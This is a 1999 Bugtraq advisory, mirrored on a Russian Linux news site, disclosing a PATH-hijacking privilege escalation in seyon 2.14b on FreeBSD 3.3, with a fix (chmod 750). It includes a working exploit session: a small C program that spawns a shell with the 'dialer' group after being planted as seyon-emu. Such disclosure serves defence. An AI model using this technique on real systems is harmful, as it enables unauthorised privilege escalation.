The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


FreeBSD 3.3's seyon vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Mon, 8 Nov 1999 20:50:38 MST
From: Brock Tellier <btellier@USA.NET.>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: FreeBSD 3.3's seyon vulnerability

Greetings,

In preparing for this advisory release, I checked for "seyon" vulnerabilities
in the bugtraq archives.  I found that the exploit I had developed had already
been discussed in May 1997.  However, this does not change the fact that the
current version of FreeBSD still ships a vulnerable version with vulnerable
privs.  I believe this is still worth noting.  Here is my advisory as it was
to be published before the previous vulnerability came to light.

OVERVIEW
A vulnerability exists in seyon v2.14b which will allow any user to upgrade
his or her privs to those with which seyon runs.

BACKGROUND
This advisory is based entierly off the work I've done on FreeBSD 3.3-RELEASE
and seyon 2.14b which is included on the FreeBSD installation CD as an
"additional package".  When installed via sysinstall, seyon's permissions are
sgid "dialer".  Different versions of seyon and different packages of 2.14b
may have different default permissions.

DETAILS
Upon startup, seyon executes the programs "seyon-emu" and "xterm".  The paths
to these programs are not absolute and are gotten from the users's $PATH.  By
adding a directory we have write access to in our $PATH and putting our own
version of seyon-emu or xterm, we can make seyon run this program with egid
dialer.  

EXPLOIT

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD  3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999    
jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC  i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x  1 bin  dialer  88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
  setregid(getegid(), getegid());
  system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$ 

FIX
Simply chmod 750 `which seyon` and add selected users to the "dialer" group.

Brock Tellier
UNIX Administrator
Chicago, IL, USA
btellier@usa.net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру